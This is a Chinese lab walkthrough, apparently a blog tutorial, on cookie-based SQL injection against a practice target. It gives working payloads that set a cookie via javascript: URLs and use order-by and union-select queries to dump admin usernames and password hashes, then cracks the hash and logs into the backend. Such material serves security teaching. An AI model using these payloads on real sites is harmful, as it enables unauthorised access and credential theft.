经过了我们前段时间的sql注入学习,今天我们来深入学习一下sql注入之cookie注入
首先我们打开靶场环境
随便点开一篇文章
尝试在结尾构造一下 and 1=1
可见是使用了防注入的,但是目前我们是使用get方式提交的参数,我们将id=171包括后面的全部删除一下试试
显示数据库出错
这里存在cookie注入,首先我们恢复成原来的界面
然后我们下载一个ModHeader浏览器插件,将cookie设置为id的值。然后我们访问
其去掉后面?id的网页,发现并没有显示数据库出错了
然后将IE栏清空,输入
javascript:alert(document.cookie="id="+escape("171"));
这个语句就是构造一个JS,把内容插入到cookie里面去
返回出一个id=171
然后我们来手工注入一下他的字段数
javascript:alert(document.cookie="id="+escape("171 order by 10"));
可以知道他有10个字段数
然后我们里显示他的值
javascript:alert(document.cookie="id="+escape("171 union select 1,2,3,4,5,6,7,8,9,10 from admin"));
再刷新一遍发现显示2,3
然后我们来破解账号和密码
javascript:alert(document.cookie="id="+escape("171 union select 1,password,username,4,5,6,7,8,9,10 from admin"));
得出来MD5加密后密码,解密后welcome,然后就可以登录后台了。
1339
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
